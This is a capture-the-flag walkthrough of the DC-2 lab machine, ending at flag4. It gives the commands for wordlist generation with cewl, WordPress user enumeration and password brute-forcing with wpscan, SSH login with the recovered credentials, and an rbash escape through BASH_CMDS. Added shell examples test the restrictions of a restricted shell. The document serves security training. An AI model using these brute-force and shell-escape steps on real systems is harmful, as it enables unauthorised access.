Did not follow redirect to http://dc-2/
The hostname needs to resolve, so add it locally:
vi /etc/hosts
add the line: 192.168.219.133 DC-2
After that http://dc-2/ is reachable.
3. dirsearch -u 192.168.219.133 -x 403,404
II. Penetration testing
1. Open the site and get flag1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
2. Build a password list with cewl (the flag1 hint points at it):
cewl http://dc-2/ -w passwd.txt
3. wpscan
// enumerate WordPress users: finds admin, tom, jerry
wpscan --url http://dc-2/ --enumerate u
// try each enumerated username against the cewl-generated list
wpscan --url http://dc-2/ -P passwd.txt -U admin
wpscan --url http://dc-2/ -P passwd.txt -U jerry
wpscan --url http://dc-2/ -P passwd.txt -U tom
Credentials found:
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
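To show why a site-derived list finds these two passwords when a generic wordlist does not, here is a minimal cewl-style word extractor run over a constructed HTML fragment. This is an added example, not the write-up author's code and not cewl itself; the sample page, MIN_LEN and the function names are assumptions made for the demonstration. cewl does the same on the crawled site, and its output is what wpscan consumes via -P.

```shell
# Constructed sample page (not fetched from dc-2): the kind of placeholder text a
# WordPress theme ships with, plus markup that the word list must not pick up.
SAMPLE_HTML='<html><head><title>DC-2 - Just another WordPress site</title>
<script>var tracker = "ignore_me_script";</script></head>
<body class="home"><h1>Welcome</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla
facilisi. Pellentesque parturient montes, nascetur ridiculus mus.</p>
<a href="http://dc-2/wp-login.php">Log in</a>&nbsp;&copy;</body></html>'

# cewl keeps words of at least 3 letters by default (its -m option changes it).
MIN_LEN=3

# Read HTML on stdin and emit one candidate word per line:
#   1. drop <script>...</script> blocks that sit on a single line
#   2. replace the remaining tags and HTML entities with spaces
#   3. split on anything that is not a letter
#   4. keep words of at least MIN_LEN letters, deduplicate
extract_words() {
  sed -e 's/<script[^>]*>.*<\/script>//g' \
      -e 's/<[^>]*>/ /g' \
      -e 's/&[a-zA-Z#0-9]*;/ /g' \
    | tr -cs 'A-Za-z' '\n' \
    | awk -v min="$MIN_LEN" 'length($0) >= min' \
    | sort -u
}

# Build the list from the constructed sample. Against a real target the input
# is the crawled site and the output is saved as the -P file for wpscan.
build_wordlist() {
  printf '%s\n' "$SAMPLE_HTML" | extract_words
}

# Exit 0 if the word is in the generated list (exact, case-sensitive match).
has_word() {
  build_wordlist | grep -qx -- "$1"
}

build_wordlist
```

Both DC-2 passwords (adipiscing, parturient) are ordinary lorem-ipsum words, so they fall out of the page text; anything inside tags, attributes, scripts or entities is discarded so that href, class or copy never end up in the list.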
The earlier dirsearch results showed the admin login at http://dc-2/wp-admin/; log in there with the credentials found above (the jerry account).
Under Pages, flag2 is found:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
4. Per the hint, find another way in
Maybe SSH?
Rescanning with nmap gives the same result.
Add -p- to scan all ports:
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
Log in:
ssh tom@192.168.219.133 -p 7744
ls shows flag3.txt
vi flag3.txt
flag3:Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
5. Privilege escalation
Most commands are unavailable in this shell.
echo $PATH // see where commands are searched for
PATH points at a single usr/bin directory: this is a restricted shell (rbash) with a heavily cut-down command set.
ls usr/bin // list the commands that are allowed
// escaping the restricted shell
Test 1: BASH_CMDS[a]=/bin/sh // then typing a runs /bin/sh
Test 2: /bin/sh // called directly; rbash rejects command names containing '/', so this only works once you are already out of the restricted shell
Test 3:
export PATH=$PATH:/bin
export PATH=$PATH:/sbin:/bin // add the system binary directories to PATH so the standard commands are found (rbash also blocks changing PATH, so this is done from the unrestricted /bin/sh)
Out of the restricted shell: cat and the other standard commands work now. This is a shell escape, not yet a privilege escalation.
su jerry // switch to jerry with the password recovered by wpscan (adipiscing)
cd ~ // go to jerry's home directory
ls shows flag4.txt
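To make the mechanics behind Tests 1 to 3 concrete, the following probes run one-liners inside a fresh restricted bash (bash -r, the same mode rbash is) and report which actions it refuses. This is an added example, not from the write-up or from the DC-2 machine; it assumes bash and uname are installed, and the probe function names are made up for the demonstration. The BASH_CMDS probe is version-dependent: the bash 4.3 build on DC-2's Debian 8 accepts the assignment, while later bash releases refuse BASH_CMDS entries containing '/' in restricted mode, so that probe is reported rather than relied on.

```shell
# Run a snippet under a fresh restricted bash (bash -r is what rbash runs as)
# and return 0 when the restricted shell refused it. Output is discarded; only
# the exit status matters.
rbash_blocks() {
  ! bash -r -c "$1" >/dev/null 2>&1
}

# The restrictions that matter for the DC-2 escape.
rbash_blocks_slash_command() { rbash_blocks '/bin/sh -c "echo x"'; }        # no '/' in command names
rbash_blocks_path_change()   { rbash_blocks 'export PATH=$PATH:/bin'; }     # PATH is read-only
rbash_blocks_cd()            { rbash_blocks 'cd /'; }                        # cannot change directory
rbash_blocks_redirect()      { rbash_blocks 'echo x > rbash_probe_output'; } # no output redirection

# What is still allowed: running external commands found through the PATH the
# shell started with (uname here).
rbash_allows_path_lookup() {
  bash -r -c 'uname' >/dev/null 2>&1
}

# Version-dependent: bash 4.3 (the Debian 8 build on DC-2) lets a restricted
# shell assign BASH_CMDS[a]=/bin/sh and then start the unrestricted /bin/sh by
# running `a`; later bash releases refuse BASH_CMDS entries containing '/'.
# Returns 0 only if the escape produced a /bin/sh that ran our command.
bash_cmds_escape_works() {
  rc=0
  bash -r -c 'BASH_CMDS[a]=/bin/sh; a -c "exit 42"' >/dev/null 2>&1 || rc=$?
  [ "$rc" -eq 42 ]
}

report() {
  for probe in rbash_blocks_slash_command rbash_blocks_path_change \
               rbash_blocks_cd rbash_blocks_redirect; do
    if "$probe"; then echo "blocked: $probe"; else echo "ALLOWED: $probe"; fi
  done
  if rbash_allows_path_lookup; then
    echo "allowed: external commands resolved via the inherited PATH (uname)"
  fi
  if bash_cmds_escape_works; then
    echo "BASH_CMDS[a]=/bin/sh escape: works (old bash, as on DC-2)"
  else
    echo "BASH_CMDS[a]=/bin/sh escape: rejected (patched bash); another allowed binary that can spawn a shell is needed"
  fi
}

report
```

The first four probes explain the order of the tests above: from inside rbash neither /bin/sh (slash in the command name) nor export PATH (read-only) is accepted, so the escape has to come from something the restricted shell still permits, and only the unrestricted /bin/sh it hands over to can then widen PATH.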
cat flag4.txt
flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!